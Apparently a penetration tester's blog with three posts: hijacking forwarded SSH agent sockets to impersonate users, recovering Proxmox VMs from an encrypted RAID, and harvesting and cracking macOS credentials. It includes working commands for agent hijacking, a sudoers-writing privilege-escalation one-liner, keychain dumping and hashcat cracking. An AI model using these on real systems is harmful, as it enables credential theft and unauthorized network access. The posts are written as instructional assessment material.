Leverage SSH Agents to Move Across the Network

Accessing a production system in a Linux environment these days often requires a lot of ssh tunneling in order to get access to restricted systems. This is because it doesn’t make sense to publicly expose SSH to the internet or even your general-use, internal network. Instead there might be a bastion or jump box with ssh exposed as your initial way into the environment. Once connecting to the bastion host successfully you can then connect to another system within that restricted network or maybe even repeat the process to gain access to even more restricted hosts.

In order to handle authentication across multiple systems users leverage ssh agents. An SSH agent is effectively a helper program which stores unencrypted identity keys and credentials in memory. This allows for the SSH client to access these credentials via a Unix stream stock. The socket makes it so the end user doesn’t have to provide their credentials multiple times. The user can also request the SSH client retains access to the socket, when connecting to another system, by enabling agent-forwarding with the -A flag.

With SSH agent-forwarding enabled, the SSH client essentially creates a linked copy of the stream socket on the remote system. By default the socket is created in the /tmp directory in a folder named ssh-<10 random characters>, with the socket named agent.<agent pid>. The ssh agent folder is only granted privileges to the connecting user account. To see what agents are around on a given machine you can look through the /tmp directory with a command similar to:

ls /tmp -l | egrep 'ssh-.{10}$'

Finding SSH Agents

Since agent sockets are stored in /tmp and the reference to which agent to use is controled entirely by the value in the SSH_AUTH_SOCK environment variable. The root account, superusers, and possibly sudoers can change their environment variable to the socket of another connected user and effectively masquerade as them on the network. In fact you would even have accesses to any of the other keys the user added to the agent. Given you have access to a shared systems root account, you could use commands like the following to impersonate the user and view a list of registered keys.

ls /tmp| egrep 'ssh-.{10}$' # list the agent sockets that may be available
export SSH_AUTH_SOCK=/tmp/'ssh-.{10}$'/agent.<pid> # choose one and set appropriate values as you SSH_AUTH_SOCK environment variable
ssh-add -l # list all credentials available to the agent

The commands could even all be combined into a single loop like the one bellow. However, the ability to query and leverage the credentials is dependent on a stable connection from the target user. Stale agents can hang, because the socket cleanup process doesn’t necessarily happen once a session is closed.

for AGENT in $(ls /tmp| egrep 'ssh-.{10}$'); do export SSH_AUTH_SOCK=/tmp/$AGENT/$(ls /tmp/$AGENT);echo $AGENT $(stat -c '%U' /tmp/$AGENT);timeout 10 ssh-add -l;done;

Note: A lot of common programs like git, rsync, scp, etc also allow you yo leverage SSH agents. So if a given agent doesn’t get you access to another system, also be sure to try and use it to authenticate against common services.

Impersonating users and pivoting

Once you have an agent you want to leverage, just set it as the SSH_AUTH_SOCK environment variable. Then use it to try and log into other systems or services as the targeted user. Its also worth mentioning that you also be able to leverage the ssh agent and port forwarding to gain access to otherwise restricted system. I’ve created a somewhat related post about leveraging port forwarding in a previous post.

Always run commands like w or who to see where the user is connecting from. Then use that IP address to try and connect back to the users origin system. Most of the time, the users public key is added to their own systems authorized_keys file for ease of access.

This issue is most often seen in development environments, where users traditionally have elevated system access. These systems are also not as well defended or updated as often as production systems. That coupled with the fact that most of the time users don’t maintain account separation between development and production environments, makes it prime to leverage ssh agents.

Recovering Proxmox VMs from Encrypted Raid Array

Initial Thoughts: Blog Reboot

It has been a few years since this Blog has been active, or frankly seen the light of day, beyond some web caches I enabled awhile back. The biggest reason for the blog phasing out, was the first server I ever built (back in 2010) having a failing mother board shortly after the birth of our first child. Now, shortly after the birth of our second child and with the abundance of free time this crisis has awarded us all, I’ve decided to give the blog and my good old Proxmox server a reboot.

Recovering Raid Array

Now since I didn’t have the original working hardware and I didn’t retain good VM backups, I had to recover the VMs from just the encrypted drives. That meant the first step to beginning this journey of recovering Proxmox VMs, was dealing with an encrypted raid 1 storage array.

To begin this recovery process I simply put the two ”high-end” 120 GB SSD drives, in the new server I built to run the latest version of Proxmox. Next we need to boot up the server and use mdadm to examine the drives to identify the raid format.

lsblk # to list all the current block devices

mdadm -E /dev/sd[c-d] #use mdadm to examine 

Then we can use mdadm to re-assemble the raid. In this case, since the the drives are mirrors it likely doesn’t matter, but for some individuals this will likely be a required step in order to complete a full recovery.

mdadm --assemble /dev/md1 /dev/sd[c-d]1 # use mdadm to re-assemble
# the raid as md1

Decrypting LVM Structure

Next we need to decrypt the raid drive so we can access the logical volumes and mount them to begin recovering Proxmox VMs from the encrypted file system.

cryptsetup luksOpen /dev/md1 encrypted_pve # Open the luks encrytped device

Now that the the encrypted device has been opened and mounted as the device encrypted_pve. We can now access the volume group within the encrypted partition with standard LVM commands.

vgdisplay --short # for instance just viewing the volume group

Now if your somewhat lazy like me and doing all of this work on the a new installation of Proxmox. Your likely going to start having a bad time and encounter issues because by default, Proxmox wants its primary volume group to be named ‘pve’ and now there are two different ones with the same name. In order to avoid confusion going forward and stop our new Proxmox server from crashing, we should rename the old ‘pve’ volume group to something else.

vgdisplay | egrep -i "uuid|name|VG size" # use vgdisplay to 
# find the UUID of the VG

vgrename QiOPy3-WhF8-RYns-44dY-FKKN-8orV-bEi3m3 pve-old # use vgrename
# to simply rename the VG using the appropriate UUID

vgscan  # lastly we can use vgscan to reload all the vgs as a 
# sanity check

Recovering Proxmox VMs Config files

Now that we have access to the original LVM structure we can go about recovering VMs from the file system. To start this process we should mount the two logical volumes Proxmox has by default. These two would be the root and data logical on our old ‘pve’ volume group.

mkdir /mnt/old-data /mnt/old-root #create directories to mount
# logical volumes

mount /dev/mapper/pve--old-root /mnt/old-root # mount old pve root

mount/dev/mapper/pve--old-data /mnt/old-data # mount old pve data

Here is the point where things diverge a bit depending on what version of your recovering from and how your VMs where originally setup. Regardless there are really only two components to a given VM in the Proxmox world, a config file and a disk image.

To recover the VM config files in newer versions of Proxmox you would just go into the /mnt/old-root/etc/pve/qemu-server/ directory. There you would likely see a bunch of VM configuration file named after the VM ID number. Generally speaking you should be able to copy these configs over to your new Proxmox server without too much of an issue.

cd /mnt/old-root/etc/pve/qemu-server/ # go to the mounted config 
# directory

cp 100.conf /etc/pve/qemu-server/

However, if your like me and you are looking around for these VMID.conf files and they aren’t on the old root filesystem. That’s because in older versions Proxmox the VM configs were stored in a sqlite database. Instead we can use the sqlite3 command on the pve-cluster config database in order to view all the VM config files and extract the ones we want directly to workable config files.

sqlite3 /mnt/old-root/var/lib/pve-cluster/config.db \
'SELECT * FROM tree;' # use sqlite3 to view all of the 
# config data in the cluster config database

sqlite3 /mnt/old-root/var/lib/pve-cluster/config.db \
'SELECT data FROM tree WHERE name = "100.conf";' \
> /etc/pve/qemu-server/100.conf 
# use a sql query to extract just the config file data 
# we need and write it to the appropriate file/code>

Recovering Proxmox VMs Raw Disks and Disk Images

When it comes to VM disk images they can be either raw, meaning they are logical volumes provisioned within a volume group using LVM or disk image files like qcow2's. Regardless of which type of VM disk image or if like me and had both. The path forward is basically the same, just copy it over to appropriate place on the never server.

In the case of raw disks, all we really need to do is copy the logical volume that was provisioned in the old volume group over to the new volume group. To do this we need to create a new logical volume on the the new volume group with the same size and name. Then use dd to copy over the raw data from the old logical volume to the new one.

lsblk # look at all our physical and logical devices to
# make sure we use the right devices

lvcreate -n vm-100-disk-1 -L 10G pve # Create the new logical 
# volume with the same name and size

# dd if=/dev/pve-old/vm-100-disk-1 bs=4096 of=/dev/pve/vm-100-disk-1 
# Use dd to complete a bit by bit copy of the LV data, ! Caution !

If you need to deal with the VM disk files, its pretty straight forward as well. Just go into the old-data directory we mounted and copy the disk image files over to the new storage location. These can be a various formats like qcow2 or vmdk, but the process is the same.

mkdir /var/lib/vz/images/100 # create the folder for your VM

cp /mnt/old-data/images/100/vm-100-disk-1.qcow2  \
/var/lib/vz/images/100/vm-100-disk-1.qcow2 
# copy over the disk image to appropriate local folder

Getting VMs to Boot

At this point Proxmox should have seen the VM configuration files added to the local nodes configuration directory and it should be visible in web UI and/or qm at the command line. The very last step in recovering Proxmox VMs is making sure your VM configuration is correct so it can boot up. I could probably do research and a whole blog post on this topic alone. So its kind of difficult to provide detailed examples of what could be wrong with a given configuration file. Since the configuration files are from working VMs, most likely issues are either device statements or the boot order.

The boot order can be forced with the bootdisk option, to a given device, such as ide0. Devices are registered in the config file as device statements like 'ide0: local:vm-100-disk-1'. Make sure your device statements are correct and your cdrom is empty such as 'ide2: none,media=cdrom' to avoid boot issues. For other errors make be sure review the documentation or ask in the comments bellow.

Mac OSX Password Cracking

Mac OSX Password Cracking

TL;DR: There are several ways to enumerate information from a Mac shell and to collect encrypted credentials for OSX password cracking.

Problem and Rationale

During a recent assessment the client had close to 10,000 Mac OSX systems throughout their global presence. All of these Macs were authenticating to Active Directory and allowed all logged in users local admin rights; via a misconfigured sudoers rule. Since this blog is lacking any real reference material specifically for OSX, I figured I would detail the information gathering and attacks I preformed during the assessment.

Attacks and Methodology

The default base install of Apple OSX will allow the primary user configured on that workstation to sudo to  root. When Active Directory backed authentication is used, newly logged in users can inherit the primary user role if system defaults are not changed. This would effectively make all domain users local admins on all of the affected Macs. This is good news since root level permission is required to pull local password hashes.

If the OSX systems do not use AD authentication don’t fret. By default the SSH server is enabled and it does not have any lock outs on failed login attempts. If all else fails, physical attacks still work very well against OSX. Just walk up to one and hold Command+S during boot to log into a single user root terminal. If the system isn’t using full disk encryption you can simply copy files over to a USB flash drive.

Once you have a terminal on a Mac, it’s good to check user and group memberships. Again, if the user is a part of the admin group they can sudo by default; and if they are part of the wheel group they are effectively root.The following is a list of useful commands to use when in a terminal:

dscl . -list /Users #List local users
dscl . -list /Groups #List local groups
dscl . -read /Groups/<Groupname> #List local group membership
dscl . -read /Users/<usersname> #List a user’s information and settings

Note: The commands above all have a target of ‘.’ or ‘localhost’. If the system is connected to Active Directory it can be queried in a similar manner.To list all Domain Admins use the following command:

dscl /Active\ Directory/<domain>/<domain.local> -list /Groups/Domain\ Admins

If the user doesn’t have sudo or root privileges, you can try to elevate to root privileges with one of several local privilege escalation vulnerabilities. Some recent noteworthy options include CVE-2015-5889, CVE-2015-1130, or just use some of the Yosemite environment variables like the following:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

If the device is up to date on its patches about all one can do is some file pillaging. The two things I would note are Apple scripts (.scpt) and property list (.plist) files are very popular in OSX. Both file types are stored to disk as binary files. As such they need to be converted back to ASCII, to be human readable.
To view the contents of an Apple script file use a command like:

osadecode logon.scpt

To convert a .plist file from binary to its native XML use a command like:

plutil -convert xml1 /path/to/file.plist

Note: plutil will convert files in place, so take care to make copies of files you’re working with.Alternatively the plist files can be exfiltrated to Kali and converted to XML using the libplist-utils library. The conversion command might look something like this:

plistutil -i user.plist -o user.xml

If root level access is acquired, we can go straight after the local user’s plist files. Each user’s plist file contains their individual settings and their encrypted credentials. The directory that contains all local users’ plist files is /private/var/db/dslocal/nodes/Default/users/.
If another user is currently logged into the system, the user’s keychain can be dumped by root. This will provide clear text access to all saved credentials, iCloud keys, the file vault encryption key, and the user’s clear text password. To dump the users keychain use a security command like:

security dump-keychain -d /Users/<user>/Library/Keychains/login.keychain

WARNING: In newer versions of OSX this will generate a dialog box on the user’s screen. This will obviously alert the user and only produce usable output if the user accepts.

OSX Password Cracking

There are several ways to gain access to the encrypted shadow data, which is needed to conduct OSX password cracking. Two of them have already been mentioned above. If you have root access preform a dscl . -read /Users/<user> or if you grab the users plist file from /private/var/db/dslocal/nodes/Default/users/ and covert it to XML, there will be a XML element called ShadowHashData. The ShadowHashData is a base64 encoded blob containing a plist file with the base64 encoded entropy, salt, and iterations within it.

Note: Before the base64 can be cleanly decoded in each of these steps, the XML elements, spaces, and line breaks will need to be removed manually.
The first step is to extract the plist file form the shadow hash data and convert it back to XML. This can be done with the following commands:

echo "<hash data>" | base64 -D > shadowhash
file shadowhash
plutil -convert xml1 shadowhash

Next cleanup and convert the base64 encoded entropy to hex format. This can be done with the following commands:

echo "<entropy data>" | base64 -D > entropy
file entropy
xxd entropy

Third cleanup and convert the base64 encoded salt to hex format. This can be completed with the following set of commands:

echo "<salt data>" | base64 -D > salt
file salt
xxd salt

Next we can put all the hex value strings together into the following hashcat format (7100).

$ml$<iterations>$<salt>$<entropy>

Lastly put that baby in hashcat as OSX v10.8/v10.9 and watch it burn.

./hashcat-cli64.app -m 7100 hash.txt wordlist.txt

As Always:

ICBfICAgXyAgICAgICAgICAgIF8gICAgICBfX19fXyBfICAgICAgICAgICAgX19fXyAgXyAgICAg
ICAgICAgICAgICAgIF8gICANCiB8IHwgfCB8IF9fIF8gIF9fX3wgfCBfXyB8XyAgIF98IHxfXyAg
IF9fXyAgfCAgXyBcfCB8IF9fIF8gXyBfXyAgIF9fX3wgfF8gDQogfCB8X3wgfC8gX2AgfC8gX198
IHwvIC8gICB8IHwgfCAnXyBcIC8gXyBcIHwgfF8pIHwgfC8gX2AgfCAnXyBcIC8gXyBcIF9ffA0K
IHwgIF8gIHwgKF98IHwgKF9ffCAgIDwgICAgfCB8IHwgfCB8IHwgIF9fLyB8ICBfXy98IHwgKF98
IHwgfCB8IHwgIF9fLyB8XyANCiB8X3wgfF98XF9fLF98XF9fX3xffFxfXCAgIHxffCB8X3wgfF98
XF9fX3wgfF98ICAgfF98XF9fLF98X3wgfF98XF9fX3xcX198